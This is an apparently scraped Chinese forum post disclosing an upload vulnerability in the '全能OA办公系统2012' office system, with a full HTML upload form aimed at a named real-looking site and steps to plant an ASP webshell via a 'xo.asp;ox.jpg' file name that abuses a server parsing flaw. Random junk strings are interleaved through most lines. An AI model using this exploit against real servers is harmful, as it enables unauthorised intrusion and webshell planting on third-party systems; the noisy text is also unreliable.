全能OA办公系统0day OA办公系统漏洞 上传漏洞

admin

全能OA办公系统 上传漏洞
​
系统介绍：

全能OA办公系统2012是功能非常强大的OA系统，目前功能已完全能满足日常办公需要。
3 D! \! j) T. M: X  F2 k
; t! [& ~1 c1 \: g主要功能：
) T- p( V( r3 B9 I% d! H5 {4 z' V0 q公司通告
工作计划
通讯助理
% Q9 i" k& t/ Y2 E9 W) {2 \  F客户资源
我的公文
; `. H* |2 T' U/ [: i4 x公文传阅
公共资源
资源预约
今日考勤
个人计划
个人通讯录
# z  R* \( J/ e0 z! F+ ?8 ^: N( }个人基本档案
: f8 Q0 t6 U" O* L: @3 {未读邮件
发邮件
$ x) z. ^1 O: Y! Q/ n1 ?( ^收件夹
寄件夹
网络硬盘
网络会议
网络调查
交流论坛

有兴趣测试的朋友可以下源码看看

源码下载：
  M& N* G: }( @1 y! [
http://www.mycodes.net/30/4750.htm

9 W3 Q. I; A$ ~: U3 m7 G) i: Y漏洞介绍：
- l% ^7 R. q5 z( h- `
由upfile.asp上传文件漏洞引起

测试方法：
/ z- T5 X' r. e4 _: X
使用名小子上传http://www.itlynn.com/upfile.asp即可
" v. w# {9 G" B$ O, G% Y& o
如果upfile.asp文件被删除不存在。

' e- {, x, ^$ W: B! B9 A% a# H! T  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
0 W) c+ g! F& ~. k$ J, ^0 e# C
如果存在那么将如下代码保存为upfile.html。

然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
! ?( d' C- e- U* x/ p% H
1 X, E/ m4 m7 A/ U4 X' M

01 <table border='0' align="center" cellpadding="5">
6 t# k8 C" e, u9 |
4 l# D4 Y) g" l/ B02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
0 H/ F6 w$ p# n9 T* Q* M! a8 v
8 \$ q% h& w2 R03 <tr>
' M# j9 I6 \* i- r/ F: _8 f. ?
) r* s, ^1 S: O2 A" r04             <td>报错：</td>

7 K* t4 ~* l& e( V3 C7 k05             <td><input type='radio' name='errnumber' value='0'>
  t6 c! u- O3 g2 R/ `7 [& Q
6 N7 j5 @: M" S) f% t+ W2 ^+ t06               自动更名
+ j2 f+ L. Y% f; L: O: B/ _
! U8 P  A1 k0 d4 M, [4 v07               <input type='radio' name='errnumber' value='1' checked>
$ q& Q9 O) Y8 V) R* E5 C
08               报错方式
; G4 c9 ~0 ^3 v/ o
7 a- Y% y! a- F: E2 P; M( q- x09               <input type='radio' name='errnumber' value='2'>

10               直接覆盖</td>

1 F1 s( T6 d3 j3 ~5 N; y$ A2 ^11           </tr>
9 m6 [" o' }; L- H' i! c
12           <tr>
2 ^  B" d# [+ \) U+ b! b
13             <td>主题：</td>

1 D& {" ^2 B' F% e) I# [& b/ Q14             <td><input type='text' name='filename' size='30'></td>
+ K( @4 X/ l5 A; _
15           </tr>
% z- G- |2 w, E0 B
9 s$ A+ _* I% P" X2 U16           <tr>
4 t" q! o' E9 o2 B& h
17             <td>文件：</td>

2 K) ?! ]8 H* r5 T+ R( q; R9 J18             <td><input type="file"name="fruit"size="30"></td>

19           </tr>

20           <tr>

2 T/ d6 H# U+ F! g) x% f1 R21             <td valign='top'>简介：</td>
" V+ y+ m4 ^9 d5 N; \  s, J! v- Y
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>

23           </tr>

24   

25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>

+ [1 E; ?* b* A% q- |1 E26           </tr>
1 e% k8 H& ^0 g8 b, @3 K& v; A1 ]
27         </form>
  P; Y; A: f( C4 P+ d
7 c4 G. `* `0 X# V- ?4 F4 p$ D: ]然后打开上传一个文件名为xo.asp;ox.jpg的文件。
* ]7 b# d- }7 ?/ U


上传成功后，马的路径是：http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
1 C4 E  z! d4 o7 ~" _. `* [
此漏洞需要配合解析漏洞利用。